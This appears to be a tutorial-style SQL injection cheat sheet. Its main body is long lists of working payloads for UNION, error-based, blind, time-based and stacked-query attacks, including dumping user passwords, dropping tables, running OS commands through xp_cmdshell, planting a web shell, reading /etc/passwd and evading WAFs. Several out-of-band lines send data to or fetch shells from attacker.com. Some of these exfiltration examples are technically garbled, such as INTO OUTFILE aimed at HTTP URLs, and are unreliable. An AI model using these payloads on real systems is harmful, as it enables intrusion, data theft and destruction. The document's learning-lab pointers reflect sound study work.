Injection Attacks: The Basics
Injection attacks occur when adversaries embed malicious inputs into an application, exploiting improper input handling or lack of sanitization. These inputs manipulate the application's logic, bypass authentication mechanisms, exfiltrate sensitive data, or even compromise the underlying server.
Think of it this way: you give instructions to an application, like asking it to fetch user details. But instead, you sneak in an additional command, saying, “Fetch user details and delete all records!” The application, unaware of the deceit, executes both commands without question.
Such attacks are particularly effective against systems that inadequately validate or sanitize user inputs, enabling attackers to modify SQL queries, execute arbitrary commands, or inject malicious code into dynamic contexts like web pages or logs.
Why Are Injection Attacks So Dangerous?
Data Exposure: Leaks confidential information like usernames, passwords, and financial details. System Compromise: Can result in full control of the server through remote code execution. Financial Damage: Breaches can lead to legal repercussions, loss of user trust, and financial liabilities. Injection attacks are versatile and can target various systems, including databases, operating systems, and even APIs.
SQL Injection: Introduction, Types, and Examples
What is SQL Injection? SQL Injection (SQLi) is a web security vulnerability where attackers manipulate SQL queries to access unauthorized data, modify databases, or even destroy data. It occurs when applications fail to sanitize user inputs, allowing malicious code to alter the logic of a query. SQL injection allows attackers to manipulate SQL queries to access, modify, or destroy sensitive data. Here's an overview of different types of SQL injection with examples.
1. Entry Point Detection
The entry point for an SQL injection is typically any input field or parameter where user input interacts with the backend database without proper sanitization. Common methods to identify these entry points include:
Error Message Testing Input fields can be tested for SQL injection using fresh examples like:
' OR 'apple' = 'apple' OR LENGTH(database()) > 0 --' AND 3*3=9
These queries can reveal error messages that indicate injection points.
Logical Condition Testing Try injecting the following logical statements
page.asp?product=2 AND 5>3 --page.asp?product=3' AND 6=6 --page.asp?product=1 AND (SELECT COUNT(*) FROM users) > 0 --
Unicode Transformation Testing Experiment with Unicode representations to bypass filters:
U+0391 (GREEK CAPITAL LETTER ALPHA) → %CE%91U+0025 (PERCENT SIGN) → %25U+03BB (GREEK SMALL LETTER LAMBDA) → %CE%BB
These can be inserted into SQL queries like:
' AND 'Α'='Α (with U+0391 for Α)' AND '%25'='%25 (using the percent sign)
Timing-Based Attacks Use time delays to test vulnerabilities:
SELECT SLEEP(5); --page.php?id=1' AND SLEEP(3) --page.php?id=1; WAITFOR DELAY '00:00:10'; -- (for MSSQL)page.php?id=1; pg_sleep(5); -- (for PostgreSQL)
If the page takes longer to load, it indicates a potential vulnerability.
Advanced Union Queries Explore database tables or columns using UNION-based injections:
1 UNION SELECT username, password FROM users; --1 UNION SELECT table_name, NULL FROM information_schema.tables WHERE table_schema=database(); --1 UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_name='users'; --
Tautology-Based Injections Try always-true conditions:
' OR 'banana'='banana' OR NOW() = NOW() --' OR 100=100#
Combined Character Injection Combine special characters and encoded values to bypass filters:
'%20OR%20'1'%3D'1'; DROP TABLE users; --'%2BSELECT%2A%20FROM%20admin%20--
2. Confirming SQL Injection
Boolean-Based Confirmation This method confirms SQL Injection by injecting payloads with conditions that always evaluate to TRUE or FALSE. Observing changes in the application's behavior or output helps identify vulnerabilities.
http://example.com/product?id=5 AND 1=1 -- (TRUE condition)http://example.com/product?id=5 AND 1=2 -- (FALSE condition)
Time-Based Confirmation Time-based confirmation relies on injecting queries that deliberately introduce delays in the database's response. If a noticeable delay occurs, the application may be vulnerable.
MySQL: http://example.com/product?id=5 AND SLEEP(5) --MSSQL: http://example.com/product?id=5; WAITFOR DELAY '00:00:05'; --MSSQL: http://example.com/product?id=5; WAITFOR DELAY '00:00:05'; --
Error-Based Confirmation This technique involves injecting payloads that generate SQL syntax or logical errors. Observing detailed error messages can help confirm and map the database structure.
http://example.com/product?id=5'http://example.com/product?id=5 AND UPDATEXML(null,concat(0x3a,(SELECT database())),null) --
In-Band vs. Out-of-Band Confirmation
- In-Band Confirmation: Uses the same communication channel (e.g., the HTTP response) to confirm the injection, often using UNION SELECT to fetch database data.
- Out-of-Band Confirmation: Uses external communication (e.g., DNS or HTTP requests) to confirm the injection and retrieve data indirectly.
- In-Band (UNION): http://example.com/product?id=5 UNION SELECT null, username, password FROM users --
- Out-of-Band (DNS): http://example.com/product?id=5; EXEC master..xp_dirtree '\attacker.com\test' --
Alternate Data Types for Validation This method involves injecting unexpected data types into fields to validate SQL Injection. This may include numeric values, strings, or special characters. Numeric Field: http://example.com/product?id=-1 UNION SELECT 1,2,3 --
3. Exploitation Techniques
Identifying and Exploiting SQL Injection Vulnerabilities
UNION-Based SQL Injection Oracle Error/Union based SQL Injection Cheatsheet Attackers use the UNION operator to merge multiple SELECT queries, extracting data from different tables.
' UNION SELECT NULL, NULL --' UNION SELECT username, password FROM users --' UNION SELECT database(), version() --' UNION SELECT table_name, column_name FROM information_schema.columns WHERE table_schema=database() --' UNION SELECT 1, GROUP_CONCAT(username, 0x3a, password) FROM users --
Error-Based SQL Injection
MSSQL Error Based SQL Injection Cheatsheet Error messages from the database are exploited to extract sensitive information.
1' AND (SELECT 1/0) --1' AND UPDATEXML(NULL, CONCAT(0x3a, (SELECT database())), NULL) --1' AND EXTRACTVALUE(1, CONCAT(0x3a, (SELECT user()))) --1' AND (SELECT table_name FROM information_schema.tables WHERE table_schema=database()) --
Boolean-Based Blind SQL Injection This technique relies on observing how the application responds to true/false conditions.
1' AND 1=1 -- (True)1' AND 1=2 -- (False)1' AND LENGTH(database())=8 --1' AND ASCII(SUBSTRING((SELECT user()), 1, 1))>64 --1' AND (SELECT COUNT(*) FROM users WHERE username='admin')>0 --
Time-Based Blind SQL Injection Time delays are used to infer whether queries are true or false, based on server response times.
' AND SLEEP(5) -- (MySQL)' OR IF(1=1, SLEEP(5), 0) -- (MySQL)' OR pg_sleep(5) -- (PostgreSQL)' AND WAITFOR DELAY '00:00:05' -- (SQL Server)' AND IF(ASCII(SUBSTRING((SELECT @@version),1,1))=77, SLEEP(5), 0) –
Out-of-Band (OOB) SQL Injection Relies on external communication (e.g., DNS or HTTP) to exfiltrate data when no direct
LOAD_FILE('\\\\attacker.com\\file') (MySQL)EXEC master..xp_dirtree '\\attacker.com\share' (SQL Server)SELECT UTL_HTTP.request('http://attacker.com') FROM DUAL; (Oracle)SELECT ... INTO OUTFILE '\\\\attacker.com\\data'
Stacked Queries SQL Injection Allows multiple queries to be executed in one request by separating them with semicolons.
1'; DROP TABLE users; --1'; INSERT INTO admin (username, password) VALUES ('attacker', 'pass'); --1'; EXEC xp_cmdshell('whoami'); -- (SQL Server)1'; CREATE TABLE hacked(data TEXT); --1'; SELECT pg_terminate_backend(pid) FROM pg_stat_activity WHERE datname='target_db'; -- (PostgreSQL)
4. Advanced SQLi in Different Databases
This techniques target various database management systems (DBMS) like MySQL, PostgreSQL, MSSQL, Oracle, and SQLite, each with its own unique syntax and behavior. These attacks involve exploiting vulnerabilities in the way SQL queries are processed by the database. Reference
5. Database Enumeration and Data Exfiltration
This section deals with techniques used to explore and extract sensitive data from a database using SQL injection (SQLi) vulnerabilities Extracting Database, Table, Column Names These payloads help extract metadata information from the database, including the name of the database, tables, and columns.
' UNION SELECT null, database(), null --
Extracts the current database name.
' UNION SELECT null, table_name, null FROM information_schema.tables WHERE table_schema = 'your_database' --
Extracts table names from a specified database.
' UNION SELECT null, column_name, null FROM information_schema.columns WHERE table_name = 'your_table' --
Extracting Data from Encrypted Columns These payloads can be used to decrypt and extract sensitive data stored in encrypted columns.
' UNION SELECT null, AES_DECRYPT(encrypted_column, 'encryption_key'), null FROM your_table --
Decrypts data in the specified encrypted column using AES decryption.
' UNION SELECT null, CONVERT(FROM_BASE64(encrypted_column), CHAR), null FROM your_table --
Decodes Base64 encoded data from the column.
Using INFORMATION_SCHEMA for Database Info These payloads extract useful database information, such as schemas, tables, and other metadata.
' UNION SELECT schema_name, null, null FROM information_schema.schemata --
Extracts all schema names from the database.
' UNION SELECT table_name, null, null FROM information_schema.tables WHERE table_schema = 'your_database' --
Extracts table names from a specific schema.
File System Enumeration via SQLi These payloads allow an attacker to read system files by exploiting SQL injection.
' UNION SELECT null, LOAD_FILE('/etc/passwd'), null --
Attempts to read the /etc/passwd file on a Unix-based system.
' UNION SELECT null, UTL_FILE.get_raw('file_path'), null --
Attempts to read any file on the server using the UTL_FILE function (Oracle SQL).
Data Exfiltration via DNS Tunneling These payloads help exfiltrate sensitive data over DNS requests by encoding the data in DNS queries.
' UNION SELECT CONCAT('attacker.com.', HEX(column_name)) FROM your_table --
Encodes and sends data in DNS queries to a domain controlled by the attacker.
6. Blind SQL Injection
A type of SQL injection attack where the attacker does not receive error messages or direct output from the database, but instead infers data based on indirect responses. It relies on the behavior of the application, such as changes in page content, time delays, or status codes, to extract sensitive information.
True/False Based Blind SQLi
' OR 1=1 -- (True)' OR 1=2 -- (False)
Error Blind SQL Injection
' AND 1=1 -- (Returns a valid result)' AND 1=2 -- (Returns an error or different response)
Time-Based Blind SQL Injection
' AND SLEEP(5) -- (Delays the response for 5 seconds if the condition is true)
Bitwise Blind SQLi Techniques
' AND (SELECT ASCII(SUBSTRING((SELECT database()), 1, 1)) & 1) = 1 --
This payload checks the least significant bit of the first character of the database name.
Conditional Blind SQL Injection
' AND IF(1=1, SLEEP(5), 0) -- (Delays for 5 seconds if the condition is true)
Advanced Boolean-Based Blind SQLi
' AND 1=1 -- (True condition, no change in output)' AND 1=2 -- (False condition, different response or no data)
7. Chained and Multi-Stage Injection
Attacks where multiple SQL injection vulnerabilities are chained together or executed in stages to extract data or execute more complex attacks.
Multiple Query Injection
' ; DROP TABLE users -- (Executes multiple SQL queries, potentially dropping a table)
Blind SQLi Chaining
' UNION SELECT NULL, column1, column2 FROM users -- (Chains blind SQL injection to retrieve column values)
Multi-Step SQLi Attacks Step 1: ' UNION SELECT NULL, table_name FROM information_schema.tables -- (Extracts table names) Step 2: ' UNION SELECT NULL, column_name FROM information_schema.columns WHERE table_name='users' -- (Extracts column names)
SQLi with Second-Order Injection ' ; INSERT INTO users (username, password) VALUES ('attacker', 'maliciouspassword') -- Later, ' SELECT * FROM users WHERE username='attacker' -- (The second query retrieves the injected data)
Encoding and Chaining SQLi Payloads
' UNION SELECT NULL, column1, column2 FROM users -- encoded as 'UNION%20SELECT%20NULL,%20column1,%20column2%20FROM%20users%20--
This payload uses URL encoding to bypass filters and chain the SQL injection attack.
8. Exploiting SQL Injection for Privilege Escalation
This category focuses on leveraging SQL injection to gain elevated privileges, bypass access controls, or escalate access to administrative or operating system levels within the target system.
Using SQLi for Administrative Access
' UNION SELECT 1, 'admin', 'password' FROM users --
Injects admin credentials directly into the database query.
' OR username='admin' AND password='admin123' --
Tests for hardcoded admin credentials.
' UNION ALL SELECT username, password FROM admin_table --
Extracts sensitive admin table data. Role-Based Privilege Escalation
' OR role='admin' --
Elevates user role to an administrative level.
' UNION SELECT NULL, username, role FROM users WHERE role='admin' --
Extracts all administrative users for privilege escalation.
' AND (SELECT CASE WHEN (role='admin') THEN 1 ELSE 0 END) --
Checks for administrative roles using a conditional query. Escalating to Operating System Level via SQLi
' UNION SELECT 1, LOAD_FILE('/etc/passwd') --
Reads OS-level files to extract sensitive information.
' UNION SELECT NULL, NULL INTO OUTFILE '/var/www/html/shell.php' --
Writes a web shell to the server for remote access.
' AND 1=CONVERT((SELECT user()), CHAR) --
Identifies the database user to escalate privileges.
' OR 1=1; EXEC xp_cmdshell('net user admin newpassword') --
Exploits stored procedures to execute OS commands.
9. Payload Construction and Customization
This category focuses on building complex and tailored payloads to bypass filters, evade detection, and achieve deeper exploitation by combining SQL Injection with other attack vectors. Crafting Complex Injection Payloads
' UNION SELECT username, password FROM users WHERE username='admin' --
Retrieves user credentials using union-based injections.
' OR (SELECT COUNT(*) FROM users WHERE username LIKE '%admin%') > 0 --
Injects a subquery to test for specific user existence.
' AND 1=IF(1=1, SLEEP(5), 0) --
Injects a conditional payload to delay server response.
Injecting Custom Functions into SQL Queries
' OR 1=1; SELECT user(), database() --
Custom query to retrieve database and user info.
' UNION SELECT NULL, CONCAT('Username: ', username, ' Password: ', password) FROM users --
Combines custom outputs into a single payload.
' UNION SELECT 1, CHAR(115,121,115,116,101,109,95,117,115,101,114) --
Uses CHAR() to obfuscate sensitive queries.
Custom SQL Injection via User Input
admin' OR '1'='1' --
Standard bypass payload to inject via input fields.
' UNION SELECT email FROM subscribers WHERE name LIKE '%test%' --
Customizes input to retrieve emails from specific patterns.
' OR id=(SELECT MAX(id) FROM orders) --
Extracts the most recent entry from an orders table.
Polymorphic Payloads for Evasion
'UnIoN/**/sElecT username, password/**/fRoM/**/users --
Breaks query syntax for evasion while maintaining functionality.
' OR '1%'='1' --
Slight modification of logic bypass payload to confuse filters.
'a'+'n'+'d'+'1'+'='+'1' --
Encodes payload into concatenated parts to avoid detection. Combining SQLi with Other Exploits (XSS, CSRF)
'; UPDATE users SET isAdmin=1 WHERE username='victim'; --<script>alert('XSS')</script>
Combines SQLi with XSS for dual impact.
<img src='http://malicious.com' onerror="document.write('<iframe src=http://victim.com/sqlattack></iframe>')">
Embeds CSRF payload within an XSS script for exploitation.
<form method="POST" action="http://victim.com/admin"><input type="hidden" name="query" value="admin' OR '1'='1"></form>
Combines SQL Injection with CSRF to send unauthorized requests.
10. Blind SQL Injection (Advanced Techniques)
Blind SQL Injection (SQLi) is a type of SQL injection where the attacker cannot directly see the output of their queries. Instead, they infer information by observing the application's behavior, such as changes in page content, HTTP responses, or execution delays. Advanced techniques involve leveraging logical, conditional, and time-based operations to extract sensitive data, bypass security mechanisms, and gain unauthorized access. Reference
11. Exploiting Stored Procedures for SQLi
SQL injection vulnerabilities occur whenever input is used in the construction of an SQL query without being adequately constrained or sanitized. The use of dynamic SQL (the construction of SQL queries by concatenation of strings) opens the door to these vulnerabilities. SQL injection allows an attacker to access the SQL servers and execute SQL code under the privileges of the user used to connect to the database. Reference
12. Error-Based SQL Injection (Advanced)
Advanced error-based SQL Injection involves leveraging database error messages to extract sensitive information, bypass security measures, and analyze system configurations
SQL Error Message Analysis Analyze database error messages to identify sensitive information like version, user, and database name. Extract database version: ' AND EXTRACTVALUE(1, CONCAT(0x7e, @@version)) -- Extract current user: ' AND UPDATEXML(1, CONCAT(0x7e, USER()), 1) --
Error Message Obfuscation Techniques Use techniques like encoding or bypassing filters to avoid detection while triggering errors. Hexadecimal encoding: ' AND EXTRACTVALUE(1, CONCAT(0x7e, 0x76657273696f6e)) -- Whitespace replacement: /!50000AND/ UPDATEXML(1, CONCAT(0x7e, DATABASE()), 1) --
Extracting Data from Database Errors Exploit error responses to extract database structure information, such as table and column names. Extract a table name: ' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT table_name FROM information_schema.tables LIMIT 1))) -- Extract a column name: ' AND UPDATEXML(1, CONCAT(0x7e, (SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1)), 1) --
Using Exception Handling for Exfiltration Trigger exceptions or forced errors to reveal sensitive information in error messages. Extract database details via error grouping: ' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT(0x7e, DATABASE(), 0x7e, FLOOR(RAND()*2)) AS error_message FROM information_schema.tables GROUP BY error_message) t) --
Leveraging SQL Errors to Extract Sensitive Data Use errors to access information about the server environment, configurations, or data directories. Identify database engine directory: ' AND EXTRACTVALUE(1, CONCAT(0x7e, @@datadir)) -- Extract server port number: ' AND EXTRACTVALUE(1, CONCAT(0x7e, @@port)) --
MySQL Error based SQL Injection Cheatsheet
13. Out-of-Band SQL Injection
Using DNS for Data Exfiltration Exfiltrate sensitive data via DNS queries. The attacker sends data as part of a DNS request, which can then be captured externally. Extract database version via DNS query:
' OR 1=1 UNION SELECT null, null, CONCAT(0x7e, DATABASE(), 0x7e), null INTO OUTFILE '/var/tmp/attacker.com/target.com' --
Extract user data via DNS request:
' UNION SELECT 1, CONCAT(0x7e, username, 0x7e), 3, 4 FROM users INTO OUTFILE '/tmp/attacker.com/user_data' --
HTTP-Based Out-of-Band SQLi Use HTTP requests (such as GET or POST) for out-of-band exfiltration, where the attacker controls a server to capture the data. Send data to an external server via HTTP request:
' OR 1=1 UNION SELECT null, null, CONCAT(0x7e, DATABASE(), 0x7e), null INTO OUTFILE'http://attacker.com/exfiltrate.php' --
Send user info to an attacker-controlled HTTP endpoint:
' UNION SELECT null, CONCAT(0x7e, username, 0x7e), null FROM users INTO OUTFILE 'http://attacker.com/user_data' --
Leveraging Email for Data Exfiltration Exploit the SQL injection vulnerability to send sensitive data to an email address via server-side email functionality. Send exfiltrated data through email:
' OR 1=1; EXEC xp_sendmail '[email protected]', 'Subject: SQLi Data', 'Data: ' + (SELECT DATABASE()) --
Extract user info and send via email:
' UNION SELECT null, null, CONCAT(0x7e, username, 0x7e) FROM users INTO OUTFILE 'ATTACKER_EMAIL_COMMAND' --
Exfiltrating Data via DNS Tunneling Data is exfiltrated via a DNS tunnel, which encodes the data into DNS queries and sends it to an attacker-controlled server for retrieval. DNS tunneling for sensitive data exfiltration:
' OR 1=1 UNION SELECT null, null, CONCAT(0x7e, USER(), 0x7e) INTO OUTFILE 'attacker.com/mydnslookup' --
Using DNS queries to send database info:
' OR 1=1 UNION SELECT null, null, CONCAT(0x7e, DATABASE(), 0x7e) INTO OUTFILE 'dnsserver.com/tunnel_data' --
Blind SQL injection with out-of-band data exfiltration
Out-of-Band SQLi with Web Shells Use web shells to facilitate the out-of-band data exfiltration, allowing an attacker to run commands and retrieve data remotely. Command injection to upload a web shell and trigger exfiltration:
' UNION SELECT null, null, LOAD_FILE('http://attacker.com/shell.php') --
Execute shell command to trigger exfiltration via DNS:
' OR 1=1 UNION SELECT null, null, LOAD_FILE('http://attacker.com/dns_tunnel') --
14. SQL Injection in NoSQL Databases
NoSQL Injection is a type of injection attack targeting NoSQL databases such as MongoDB, CouchDB, and others, where attackers can manipulate queries to gain unauthorized access or retrieve sensitive data. Reference
15. WAF and IDS/IPS Bypass Techniques
SQL Injection (SQLi) attacks are commonly blocked by Web Application Firewalls (WAFs) and Intrusion Detection/Prevention Systems (IDS/IPS). However, attackers use various evasion techniques to bypass these security mechanisms
SQLi Evasion with URL Encoding
URL encoding, also known as percent encoding, converts special characters (like quotes, spaces, and equals signs) into encoded representations (e.g., %27 for a single quote '). WAFs often detect SQL injection patterns by looking for these special characters, but URL encoding helps evade detection by hiding the malicious characters in the payload. Example Payloads:
' OR 1=1 -- can be encoded as %27%20OR%201%3D1%20--admin'-- can be encoded as admin%27--
This technique is particularly useful against WAFs that rely on pattern-matching mechanisms to detect malicious input.
Using Case Sensitivity for Evasion SeLeCt instead of SELECT FrOm instead of FROM WhErE instead of WHERE This method bypasses WAFs and IDS/IPS that look for specific case-sensitive SQL keywords
Obfuscating SQL Queries for WAF Evasion
admin' -- can be obfuscated as admin'/* --1 OR 1=1 can be written as 1/* AND */1=1
Obfuscation techniques are commonly used to confuse WAFs and IDS/IPS systems by making the payload look innocuous while still executing maliciously.
Evading WAFs with Custom Headers WAFs typically inspect request URLs, parameters, and bodies. Attackers can evade WAF detection by injecting malicious payloads into less scrutinized HTTP headers, such as User-Agent, X-Forwarded-For, or Referer. Custom headers are not always filtered by WAFs. Injecting into X-Forwarded-For: X-Forwarded-For: 127.0.0.1' OR 1=1 -- Injecting into User-Agent: User-Agent: admin' OR 1=1 -- Custom headers allow attackers to bypass traditional input-based WAF rules by hiding their malicious payloads in HTTP headers that may not be closely monitored.
Using Polymorphic Payloads for WAF Bypass Polymorphic payloads are dynamic and change their structure with each attack. The payload’s appearance varies, making it difficult for WAFs to identify malicious patterns. These payloads may change their format, encoding, or structure while maintaining their functionality.
admin' UNION SELECT null, null, null -- could be changed to:admin' union select null, null, null --admin'/* union select null, null, null */ --
Polymorphic payloads can use various encoding methods, character substitutions, or modifications that alter the payload's structure each time, reducing the chances of detection by WAF signature-based systems. This technique is effective against WAFs and IDS/IPS systems that rely on static signature matching, as polymorphic payloads constantly evolve and evade detection.
Writeup Exploiting an SQL injection with WAF bypass 5 Ways I Bypassed Your Web Application Firewall
16. SQL Injection and Application Security Testing
Web Application esting for SQL Injection SQL-Injection-Testing-Project Input Validation Testing
###Cheatsheet's PayloadsAllTheThings Sql-injection-payload-list Advanced-SQL-Injection-Cheatsheet
Hands-On Labs, Tools, and Resources
Interactive Labs PortSwigger Web Security Academy A free resource with interactive SQLi labs covering all types and difficulties.
picoCTF Security challenges that include SQL Injection scenarios for all levels.
OverTheWire: Natas A CTF platform focusing on web application vulnerabilities, including SQL Injection.
TryHackMe SQL Injection Lab Beginner-friendly guided labs for learning and practicing SQLi.
Hack The Box Advanced challenges and machines vulnerable to SQLi and other exploits.
Dedicated Projects and Resources
SQLi Labs by Audi-1 A GitHub project with progressively harder SQLi challenges to master the skill. Damn Vulnerable Web Application (DVWA) A web application intentionally vulnerable to SQLi and other attacks. OWASP Juice Shop A modern application with vulnerabilities, including SQLi, for training purposes. Vulnhub Pre-configured virtual machines vulnerable to SQLi and other web exploits.
Automation Tools for SQL Injection
-
SQLMap An open-source tool to automate SQL injection detection and exploitation.
-
NoSQLMap A tool specifically for NoSQL database injection and exploitation.
-
Burp Suite A robust web vulnerability scanner that includes tools for testing SQLi.
-
Havij A user-friendly tool for automating SQLi testing.
-
SQL Injection Scanner - Vega A web vulnerability scanner that can detect SQL injection vulnerabilities.
Books and Learning Resources
-
SQL Injection Attacks and Defense Comprehensive guide to understanding and mitigating SQL injection.
-
OWASP SQL Injection Cheat Sheet A concise reference for SQLi prevention techniques.
-
PentesterLab Paid and free resources to learn web application vulnerabilities, including SQLi.
-
CTF Learn Beginner-friendly CTF challenges focused on SQLi and other vulnerabilities.